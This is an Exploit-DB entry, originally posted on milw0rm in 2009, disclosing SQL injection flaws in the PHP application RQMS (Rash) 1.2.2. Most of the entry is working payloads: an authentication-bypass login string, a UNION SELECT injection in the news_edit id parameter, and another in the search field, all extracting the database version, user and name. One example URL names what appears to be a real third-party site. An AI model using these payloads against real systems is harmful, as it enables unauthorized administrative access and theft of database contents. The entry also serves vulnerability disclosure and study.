RQms (Rash) 1.2.2 - Multiple SQL Injections

EDB-ID:

8433

CVE:

N/A

EDB Verified:

Author:

Dimi4

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-04-14

Vulnerable App:

 ########################################
 #                                                                   
 # Product : RQMS                                          
 # Version : 1.2.2                                            
 # Dork : Rash Version: 1.2.1                           
 # Site: http://rqms.sourceforge.net                  
 # Found by: Dimi4                                         
 # Greetz: UASC (http://uasc.org.ua), antichat  
 #                                                                  
 ########################################
Multiple Remote Vulnerabilities

Need: magic_quotes_gpc = OFF
1)Auth BYPASS
http://127.0.0.1/rash-v1.2.2/?admin
Login: ' OR 1=1/*

2) Sql-injection
http://nocude.maisum.net/?admin
http://target/rash-v1.2.2/?news_edit&id=4'+union+select+1,concat_ws(0x3a,version(),user(),database()),3/*

3) Sql-inj in Search
http://target//rash-v1.2.2/?search
Search: ' union select database(),version(),user(),4,5,6/*

# (c) Dimi4, UASC (http://uasc.org.ua)

# milw0rm.com [2009-04-14]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services